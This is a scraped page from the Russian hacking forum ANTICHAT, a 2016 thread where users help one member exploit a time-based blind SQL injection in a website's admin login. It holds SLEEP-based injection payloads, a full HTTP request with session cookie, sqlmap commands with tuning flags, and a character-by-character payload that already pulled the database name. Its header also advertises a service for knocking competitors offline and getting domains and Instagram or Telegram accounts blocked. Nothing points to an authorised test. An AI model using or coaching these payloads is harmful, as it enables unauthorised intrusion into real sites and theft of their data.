УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 155 из 296

155

Опции темы

Поиск в этой теме

Опции просмотра

#1541

06.12.2016, 20:39

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Точно .

джино хостинг кстати, у них какая то интересная настройка не то пых не то апач, пых наверно

#1542

06.12.2016, 20:46

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Подскажите Blind SQL Injection на https://site.com/admin/login/ через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj

да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((

#1543

06.12.2016, 20:49

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от madam

madam said:
↑
Подскажите Blind SQL Injection на
https://site.com/admin/login/
через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj
да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((

sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)

#1544

06.12.2016, 20:55

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)

Вот я и говорю мож не те параметры задаю((

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login

sqlmap.py -u https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent

что тогда здесь не так?

#1545

06.12.2016, 20:59

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от madam

madam said:
↑
Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?

мде

для начала

Код:

Code:
sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs

#1546

06.12.2016, 21:20

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
мде
для начала

Код:

Code:
sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs

POST parameter 'username' is not injectable((

#1547

06.12.2016, 21:30

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от madam

madam said:
↑
POST parameter 'username' is not injectable((

--prefix="'+" --suffix="+'" --technique=T

#1548

06.12.2016, 22:55

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Всё равно ничего не находит((

#1549

06.12.2016, 23:05

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

задавай параметры пустые

#1550

06.12.2016, 23:19

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
задавай параметры пустые

в смысле логин и пароль ,уже пыталась

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

вот таким перебором вытащила имя базы

но вот sqlmap никак нехочет найти ihj